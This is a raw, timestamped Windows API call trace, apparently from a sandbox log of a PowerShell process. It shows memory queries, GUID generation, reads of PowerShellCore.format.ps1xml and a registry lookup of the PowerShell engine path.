	[0299.518] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.518] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.518] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.518] VirtualQuery (in: lpAddress=0x12b5e0, lpBuffer=0x12c4a0, dwLength=0x30 | out: lpBuffer=0x12c4a0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.518] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.518] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.518] VirtualQuery (in: lpAddress=0x12b910, lpBuffer=0x12c7d0, dwLength=0x30 | out: lpBuffer=0x12c7d0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.519] VirtualQuery (in: lpAddress=0x12b9a0, lpBuffer=0x12c860, dwLength=0x30 | out: lpBuffer=0x12c860*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.519] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x59123708, Data2=0xc4d4, Data3=0x48e6, Data4=([0]=0xb2, [1]=0xeb, [2]=0xf7, [3]=0x48, [4]=0x57, [5]=0x3d, [6]=0xb9, [7]=0x11))) returned 0x0
	[0299.519] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xc982841e, Data2=0x1036, Data3=0x4a53, Data4=([0]=0x90, [1]=0x7, [2]=0x11, [3]=0x2, [4]=0xb2, [5]=0x0, [6]=0x7b, [7]=0x3d))) returned 0x0
	[0299.519] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x59d0274, Data2=0xfd92, Data3=0x4d83, Data4=([0]=0x85, [1]=0xc, [2]=0xd3, [3]=0x53, [4]=0x2c, [5]=0x9, [6]=0xce, [7]=0x21))) returned 0x0
	[0299.519] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xcad6380f, Data2=0x8c2e, Data3=0x4207, Data4=([0]=0xb9, [1]=0x34, [2]=0x95, [3]=0x33, [4]=0x74, [5]=0xee, [6]=0x3e, [7]=0x32))) returned 0x0
	[0299.519] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xe0f7d881, Data2=0x667f, Data3=0x45ca, Data4=([0]=0xab, [1]=0x73, [2]=0xbd, [3]=0xed, [4]=0xa, [5]=0xb7, [6]=0xc9, [7]=0x3))) returned 0x0
	[0299.519] VirtualQuery (in: lpAddress=0x12b6f0, lpBuffer=0x12c5b0, dwLength=0x30 | out: lpBuffer=0x12c5b0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.519] VirtualQuery (in: lpAddress=0x12b780, lpBuffer=0x12c640, dwLength=0x30 | out: lpBuffer=0x12c640*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0299.519] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xefaa571a, Data2=0x6468, Data3=0x4352, Data4=([0]=0xb7, [1]=0x2d, [2]=0x7b, [3]=0xf9, [4]=0x6d, [5]=0xaf, [6]=0x7c, [7]=0xe8))) returned 0x0
	[0299.520] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x87c9d856, Data2=0xb323, Data3=0x4d3b, Data4=([0]=0x97, [1]=0x80, [2]=0xa4, [3]=0xa3, [4]=0x71, [5]=0xae, [6]=0xb0, [7]=0x9f))) returned 0x0
	[0299.520] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x7a9984d5, Data2=0xaf61, Data3=0x4e60, Data4=([0]=0xac, [1]=0xd0, [2]=0x31, [3]=0xb9, [4]=0xb4, [5]=0xb, [6]=0x6d, [7]=0x52))) returned 0x0
	[0299.520] SetErrorMode (uMode=0x1) returned 0x1
	[0299.520] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x334
	[0299.520] GetFileType (hFile=0x334) returned 0x1
	[0299.520] SetErrorMode (uMode=0x1) returned 0x1
	[0299.520] GetFileType (hFile=0x334) returned 0x1
	[0299.520] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.520] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.521] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.521] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.521] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.521] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.521] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.521] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.521] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.522] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.522] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.522] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0299.523] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.053] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.054] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.054] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.054] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.055] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.055] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.056] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.056] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x1000, lpOverlapped=0x0) returned 1
	[0300.056] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0xe67, lpOverlapped=0x0) returned 1
	[0300.056] ReadFile (in: hFile=0x334, lpBuffer=0x2ffca1f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffca1f*, lpNumberOfBytesRead=0x12ced8*=0x0, lpOverlapped=0x0) returned 1
	[0300.056] ReadFile (in: hFile=0x334, lpBuffer=0x2ffd450, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12ced8, lpOverlapped=0x0 | out: lpBuffer=0x2ffd450*, lpNumberOfBytesRead=0x12ced8*=0x0, lpOverlapped=0x0) returned 1
	[0300.057] SetErrorMode (uMode=0x1) returned 0x1
	[0300.057] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12ce80 | out: lpFileInformation=0x12ce80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0300.057] SetErrorMode (uMode=0x1) returned 0x1
	[0300.057] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0300.057] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12cf68 | out: phkResult=0x12cf68*=0x334) returned 0x0
	[0300.057] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12ceec, lpData=0x0, lpcbData=0x12cee8*=0x0 | out: lpType=0x12ceec*=0x1, lpData=0x0, lpcbData=0x12cee8*=0x56) returned 0x0
	[0300.057] CoTaskMemAlloc (cb=0x5a) returned 0x3cf290
	[0300.057] RegQueryValueExW (in: hKey=0x334, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12cebc, lpData=0x3cf290, lpcbData=0x12ceb8*=0x56 | out: lpType=0x12cebc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12ceb8*=0x56) returned 0x0
	[0300.057] CoTaskMemFree (pv=0x3cf290) 
	[0300.058] RegCloseKey (hKey=0x334) returned 0x0
	[0300.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0300.058] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12ca60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0300.059] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x543c0b78, Data2=0xd60a, Data3=0x40ce, Data4=([0]=0x9b, [1]=0xad, [2]=0x86, [3]=0x9, [4]=0x1f, [5]=0x32, [6]=0xc0, [7]=0x3b))) returned 0x0
	[0300.059] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xb45edf1b, Data2=0x2294, Data3=0x4166, Data4=([0]=0xac, [1]=0x3b, [2]=0x9f, [3]=0x63, [4]=0xe9, [5]=0x55, [6]=0x3f, [7]=0x9e))) returned 0x0
	[0300.060] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xe176c205, Data2=0x5a14, Data3=0x408c, Data4=([0]=0x8f, [1]=0xd9, [2]=0x7, [3]=0xd7, [4]=0x6a, [5]=0x8b, [6]=0x1f, [7]=0x27))) returned 0x0
	[0300.060] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xff37b906, Data2=0x1d4e, Data3=0x4365, Data4=([0]=0xb5, [1]=0xd0, [2]=0x1f, [3]=0x23, [4]=0x31, [5]=0xd1, [6]=0xf4, [7]=0xb9))) returned 0x0
	[0300.060] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xcb21c24, Data2=0xede0, Data3=0x4b47, Data4=([0]=0xb1, [1]=0x68, [2]=0x5a, [3]=0x2b, [4]=0xe2, [5]=0xc0, [6]=0x42, [7]=0x75))) returned 0x0
	[0300.060] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x8b6e1a06, Data2=0x2710, Data3=0x49fd, Data4=([0]=0x8a, [1]=0xb4, [2]=0x33, [3]=0x4, [4]=0x1b, [5]=0x95, [6]=0x14, [7]=0x92))) returned 0x0
	[0300.060] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xa4d9d0fa, Data2=0x5cf8, Data3=0x4bb5, Data4=([0]=0xb9, [1]=0xa4, [2]=0x72, [3]=0xf1, [4]=0xf0, [5]=0x54, [6]=0xe1, [7]=0x37))) returned 0x0
	[0300.060] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.060] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xb8b29ae7, Data2=0x36b7, Data3=0x4454, Data4=([0]=0x8a, [1]=0x66, [2]=0x99, [3]=0xee, [4]=0x2b, [5]=0x27, [6]=0x91, [7]=0x58))) returned 0x0
	[0300.060] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xd18d2960, Data2=0x1792, Data3=0x4bee, Data4=([0]=0x8a, [1]=0x2, [2]=0xe0, [3]=0xa2, [4]=0xe3, [5]=0xd, [6]=0x42, [7]=0xa2))) returned 0x0
	[0300.060] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x737e657, Data2=0xf439, Data3=0x47cd, Data4=([0]=0x83, [1]=0x6e, [2]=0x35, [3]=0x33, [4]=0x9a, [5]=0xe6, [6]=0x11, [7]=0xb8))) returned 0x0
	[0300.061] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x41125838, Data2=0x27aa, Data3=0x4982, Data4=([0]=0xa4, [1]=0x78, [2]=0xee, [3]=0x6d, [4]=0xf5, [5]=0x50, [6]=0x97, [7]=0x8f))) returned 0x0
	[0300.061] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x7a63434e, Data2=0xbf64, Data3=0x44d2, Data4=([0]=0xa7, [1]=0x1d, [2]=0xcd, [3]=0x31, [4]=0xa6, [5]=0x66, [6]=0x10, [7]=0xb5))) returned 0x0
	[0300.061] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x41e43f9b, Data2=0xbcf7, Data3=0x4cf4, Data4=([0]=0xab, [1]=0xec, [2]=0x71, [3]=0xe8, [4]=0x1a, [5]=0x9f, [6]=0x5c, [7]=0x41))) returned 0x0
	[0300.061] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x37cbbc55, Data2=0x7d60, Data3=0x45be, Data4=([0]=0x97, [1]=0x3f, [2]=0x5c, [3]=0x52, [4]=0xce, [5]=0x8a, [6]=0xec, [7]=0x2d))) returned 0x0
	[0300.061] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xa974fb3d, Data2=0x785e, Data3=0x41e9, Data4=([0]=0x8d, [1]=0x96, [2]=0x71, [3]=0xd0, [4]=0xeb, [5]=0x98, [6]=0x1c, [7]=0x3f))) returned 0x0
	[0300.061] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xbed13f40, Data2=0x915, Data3=0x42ce, Data4=([0]=0xbd, [1]=0x80, [2]=0xbe, [3]=0x89, [4]=0xa9, [5]=0x39, [6]=0xe, [7]=0x23))) returned 0x0
	[0300.061] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x90a71f4a, Data2=0xfff1, Data3=0x427a, Data4=([0]=0xa9, [1]=0xde, [2]=0x15, [3]=0xed, [4]=0x2b, [5]=0x79, [6]=0x99, [7]=0x96))) returned 0x0
	[0300.061] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xbff51bfb, Data2=0xa480, Data3=0x40b8, Data4=([0]=0xaf, [1]=0x37, [2]=0x6b, [3]=0xf2, [4]=0x51, [5]=0x6f, [6]=0x3e, [7]=0x7e))) returned 0x0
	[0300.061] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x50dddfe8, Data2=0x49e0, Data3=0x4ddd, Data4=([0]=0xab, [1]=0xcf, [2]=0x9, [3]=0xc9, [4]=0x51, [5]=0xf5, [6]=0x53, [7]=0x1a))) returned 0x0
	[0300.062] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.062] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.062] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.062] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xe4540175, Data2=0x1bfd, Data3=0x4051, Data4=([0]=0xbd, [1]=0x37, [2]=0x95, [3]=0x19, [4]=0x3e, [5]=0x57, [6]=0x5f, [7]=0x98))) returned 0x0
	[0300.062] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xb932560f, Data2=0xadcf, Data3=0x412a, Data4=([0]=0xab, [1]=0xbd, [2]=0xd3, [3]=0x59, [4]=0xa9, [5]=0x3e, [6]=0xb1, [7]=0x16))) returned 0x0
	[0300.062] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xdf902f82, Data2=0x3893, Data3=0x4d29, Data4=([0]=0x80, [1]=0x22, [2]=0x8f, [3]=0xd4, [4]=0x5a, [5]=0x98, [6]=0xdf, [7]=0x6c))) returned 0x0
	[0300.062] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x7930af44, Data2=0x18f1, Data3=0x452b, Data4=([0]=0xaf, [1]=0x39, [2]=0xa9, [3]=0x88, [4]=0x33, [5]=0x29, [6]=0x90, [7]=0x4e))) returned 0x0
	[0300.062] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x9efb951e, Data2=0x4906, Data3=0x4b16, Data4=([0]=0xa0, [1]=0x94, [2]=0x48, [3]=0x3e, [4]=0x74, [5]=0xac, [6]=0x6e, [7]=0xd9))) returned 0x0
	[0300.062] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xf319e66d, Data2=0x1b84, Data3=0x4ea3, Data4=([0]=0x90, [1]=0x77, [2]=0x60, [3]=0x24, [4]=0x4b, [5]=0x54, [6]=0xb2, [7]=0x9))) returned 0x0
	[0300.063] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x9f8f445c, Data2=0x2b7a, Data3=0x4ede, Data4=([0]=0xae, [1]=0x1d, [2]=0xfc, [3]=0x3d, [4]=0x50, [5]=0xd9, [6]=0x37, [7]=0x24))) returned 0x0
	[0300.063] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x939ec63f, Data2=0xe3ee, Data3=0x4495, Data4=([0]=0xa6, [1]=0xe4, [2]=0xbe, [3]=0x57, [4]=0xae, [5]=0xb7, [6]=0x8, [7]=0x99))) returned 0x0
	[0300.063] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xb59e05ea, Data2=0x3125, Data3=0x40c3, Data4=([0]=0x97, [1]=0xc, [2]=0xcf, [3]=0xb1, [4]=0xf4, [5]=0x27, [6]=0x70, [7]=0xa5))) returned 0x0
	[0300.063] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x8142ef1b, Data2=0xe3ce, Data3=0x471a, Data4=([0]=0x8d, [1]=0x5f, [2]=0x79, [3]=0x2a, [4]=0x2e, [5]=0x8d, [6]=0x11, [7]=0x20))) returned 0x0
	[0300.063] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xf86d3a4b, Data2=0xe1fd, Data3=0x4650, Data4=([0]=0xab, [1]=0xa2, [2]=0x8d, [3]=0x5e, [4]=0xef, [5]=0x85, [6]=0xf, [7]=0xa))) returned 0x0
	[0300.063] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xc2f1a097, Data2=0xbd, Data3=0x4154, Data4=([0]=0xa0, [1]=0x93, [2]=0x22, [3]=0xb5, [4]=0xe7, [5]=0x8c, [6]=0xb0, [7]=0x97))) returned 0x0
	[0300.063] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x37c2ad5c, Data2=0x9f19, Data3=0x44db, Data4=([0]=0xbc, [1]=0xee, [2]=0xc3, [3]=0x15, [4]=0xc7, [5]=0x8c, [6]=0x6f, [7]=0xb4))) returned 0x0
	[0300.063] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.063] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0xa30bc1fc, Data2=0x4fba, Data3=0x4a7b, Data4=([0]=0x9d, [1]=0x38, [2]=0x44, [3]=0xfa, [4]=0x5a, [5]=0xce, [6]=0x2f, [7]=0xe0))) returned 0x0
	[0300.064] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.064] VirtualQuery (in: lpAddress=0x12bb40, lpBuffer=0x12ca00, dwLength=0x30 | out: lpBuffer=0x12ca00*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0300.065] CoCreateGuid (in: pguid=0x12d190 | out: pguid=0x12d190*(Data1=0x2e4e537f, Data2=0x17a8, Data3=0x4f6a, Data4=([0]=0xaf, [1]=0x72, [2]=0x2d, [3]=0x3, [4]=0x69, [5]=0x92, [6]=0x1c, [7]=0x4))) returned 0x0
